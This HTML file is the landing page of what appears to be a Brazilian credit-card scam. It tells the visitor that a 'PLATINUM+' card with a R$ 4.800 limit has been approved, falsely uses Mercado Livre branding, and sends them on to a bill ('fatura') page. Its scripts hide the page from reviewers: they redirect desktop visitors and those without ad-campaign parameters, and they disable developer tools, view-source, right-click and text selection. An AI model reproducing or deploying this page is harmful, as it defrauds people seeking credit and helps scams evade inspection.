<!DOCTYPE html><html lang="pt-BR"><head>
    <script disable-devtool-auto="" src="https://cdn.jsdelivr.net/npm/disable-devtool"
    url="https://appavaliadorpremios.shop/lp/"></script>

<script type="text/javascript">
    if (!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|IEMobile)/) && window.innerWidth > 768) {
        window.location.href = 'https://appavaliadorpremios.shop/lp/';
    }
</script>
    <script type="text/javascript">
        (function () {
            /**
             * Função para verificar a presença de múltiplos parâmetros na URL
             * @param {Array} names - Array contendo os nomes dos parâmetros a serem verificados
             * @returns {boolean} - Retorna true se todos os parâmetros estiverem presentes, caso contrário, false
             */
            function hasAllURLParameters(names) {
                const urlParams = new URLSearchParams(window.location.search);
                return names.every(param => urlParams.has(param));
            }
    
            // Array contendo os parâmetros obrigatórios
            const requiredParams = ['CampaignID', 'adSETID', 'CreativeID', 'pixel_id'];
    
            // URL para redirecionamento caso algum dos parâmetros não esteja presente
            const redirectURL = 'https://appavaliadorpremios.shop/lp/';
    
            /**
             * Função principal que verifica os parâmetros da URL
             * e redireciona o usuário se necessário
             */
            function checkURLParameters() {
                if (!hasAllURLParameters(requiredParams)) {
                    window.location.href = redirectURL;
                }
            }
    
            // Executa a verificação imediatamente assim que o script é carregado
            checkURLParameters();
        })();
    </script>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <title>Cartão Aprovado</title>

    <link href="css/bootstrap.min.css" rel="stylesheet">
  

    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: #f9f9f9;
            color: #333;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }

        .header {
            background-color: white;
            padding: 15px 0;
            text-align: center;
            font-size: 1.5rem;
            font-weight: bold;
            background: linear-gradient(147deg, #ffe53b 0%, #ff2525 74%);
        }

        .header img {
            width: 120px;
        }

        .main-content {
            max-width: 600px;
            background: #fff;
            margin: 30px auto;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0 4px 15px rgba(0, 0, 0, 0.1);
        }

        .success-icon {
            width: 60px;
            height: 60px;
            margin: 0 auto 20px;
            display: flex;
            align-items: center;
            justify-content: center;
            background-color: #d4f9e5;
            border-radius: 50%;
        }

        .success-icon img {
            width: 40px;
        }

        .highlight-box {
            background-color: #f0f0f0;
            padding: 15px;
            border-radius: 8px;
            margin: 20px 0;
            text-align: center;
            color: #333;
            font-size: 14px;
        }

        .limit-card {
            background-color: #ff2525;
            color: #fff;
            padding: 15px;
            border-radius: 8px;
            text-align: center;
            margin: 20px 0;
        }

        .limit-card h5 {
            margin: 0;
            font-size: 18px;
            text-transform: uppercase;
        }

        .limit-card p {
            font-size: 24px;
            font-weight: bold;
            margin: 5px 0 0 0;
        }

        .benefits-list {
            margin: 20px 0;
        }

        .benefits-list .benefit-item {
            display: flex;
            align-items: center;
            padding: 10px;
            border: 1px solid #e6e6e6;
            border-radius: 8px;
            margin-bottom: 10px;
            background-color: #f9f9f9;
        }

        .benefits-list .benefit-item img {
            width: 24px;
            height: 24px;
            margin-right: 15px;
        }

        .btn-custom {
            width: 100%;
            padding: 12px;
            background-color: #ff2525;
            color: #ffffff;
            border: none;
            border-radius: 8px;
            font-size: 16px;
            font-weight: bold;
            text-align: center;
            cursor: pointer;
        }

        .btn-custom:hover {
            background-color: #000;
        }

        .footer {
        background: #ffffff;
        border-top: 1px solid #e6e6e6;
        text-align: center;
        padding: 15px;
        font-size: 10px;
        color: #666;
    }
    </style>

<script>
if (document.addEventListener) {
    document.addEventListener("keydown", bloquearSource);
} else { //Versões antigas do IE
    document.attachEvent("onkeydown", bloquearSource);
}

function bloquearSource(e) {
    e = e || window.event;

    var code = e.which || e.keyCode;

    if (
        e.ctrlKey &&
        (code == 83 || code == 85) //83 = S, 85 = U
    ) {
        if (e.preventDefault) {
            e.preventDefault();
        } else {
            e.returnValue = false;
        }

        return false;
    }
}
</script>

<style>
/*desabilita a seleção no body*/
body {
    -webkit-touch-callout: none; /* iOS Safari */
      -webkit-user-select: none; /* Chrome/Safari/Opera */
       -khtml-user-select: none; /* Konqueror */
         -moz-user-select: none; /* Firefox */
          -ms-user-select: none; /* Internet Explorer/Edge */
              user-select: none;
}

/*habilita a seleção nos campos editaveis*/
input, textarea {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: text; /* Chrome/Safari/Opera */
       -khtml-user-select: text; /* Konqueror */
         -moz-user-select: text; /* Firefox */
          -ms-user-select: text; /* Internet Explorer/Edge */
              user-select: text;
}

/*habilita a seleção nos campos com o atributo contenteditable*/
[contenteditable=true] {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: all; /* Chrome/Safari/Opera */
       -khtml-user-select: all; /* Konqueror */
         -moz-user-select: all; /* Firefox */
          -ms-user-select: all; /* Internet Explorer/Edge */
              user-select: all;
}
</style>

<script>
if (document.addEventListener) {
    document.addEventListener("contextmenu", function(e) {
        e.preventDefault();
        return false;
    });
} else { //Versões antigas do IE
    document.attachEvent("oncontextmenu", function(e) {
        e = e || window.event;
        e.returnValue = false;
        return false;
    });
}
</script>

<script type="text/javascript" async="" src="f.txt"></script>

<!-- Google tag (gtag.js) -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=G-NGSPZL3X93"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-NGSPZL3X93');
</script>


</head>


    <!-- Header -->
    <body><div class="header">
        <img src="images/logo.png" alt="YES Card">
    </div>

    <!-- Main Content -->
    <div class="main-content">
        <!-- Success Icon -->
        <div class="success-icon">
            <img src="images/ok--v1.png" alt="Aprovado">
        </div>
        <h3 class="text-center">Seu cartão foi aprovado com sucesso!</h3>
        <p class="text-center text-muted">Parabéns! Você agora tem acesso a todos os benefícios exclusivos do seu novo cartão.</p>

        <!-- Limite Box -->
        <div class="highlight-box">
            Analisamos suas informações e notamos que este é o primeiro cartão que você solicita conosco. Sendo assim, não conseguimos liberar limites acima de R$ 5.000,00.
        </div>

        <div class="limit-card">
            <h8>Seu novo cartão</h8><br>
            <h5>PLATINUM+</h5><br>
            
             <h8>Limite Aprovado</h8>
            <p>R$ 4.800,00</p>
        </div>

        <!-- Benefícios -->
        <h5>Conheça o novo cartão PLATINUM+</h5>
        <p class="text-muted">Além do crédito liberado, você terá esses benefícios:</p>
        <div class="benefits-list">
            <div class="benefit-item">
                <img src="images/atm.png" alt="Saque">
                <span>Saque até 50% do limite em caixa eletrônico 24h</span>
            </div>
            <div class="benefit-item">
                <img src="images/discount.png" alt="Cashback">
                <span>Cashback de até 5% em compras online</span>
            </div>
            <div class="benefit-item">
                <img src="images/pharmacy-shop.png" alt="Farmácia">
                <span>Descontos de até 15% em farmácias Pacheco</span>
            </div>
            <div class="benefit-item">
                <img src="images/shopping-bag.png" alt="Lojas Parceiras">
                <span>Descontos em lojas parceiras</span>
            </div>
            <div class="benefit-item">
                <img src="images/airport.png" alt="VIP">
                <span>Acesso a salas VIP em aeroportos</span>
            </div>
        </div>

        <!-- Button -->
        <button class="btn-custom" onclick="location.href='fatura.html' + window.location.search" id="3c817a41-4e79-7957-fe81-f8febebf1d19">Continuar</button>
    </div>

    <!-- Footer -->
    <div class="footer">
Copyright © 2025 Mercado Livre. Todos os direitos reservados.<br>

Política de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa do Site
    </div>

<script>
      window.pixelId = "66b3a64f335ef199b3e5b257";
      var a = document.createElement("script");
      a.setAttribute("async", "");
      a.setAttribute("defer", "");
      a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
      document.head.appendChild(a);
    </script>
    
    <script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>



</body></html>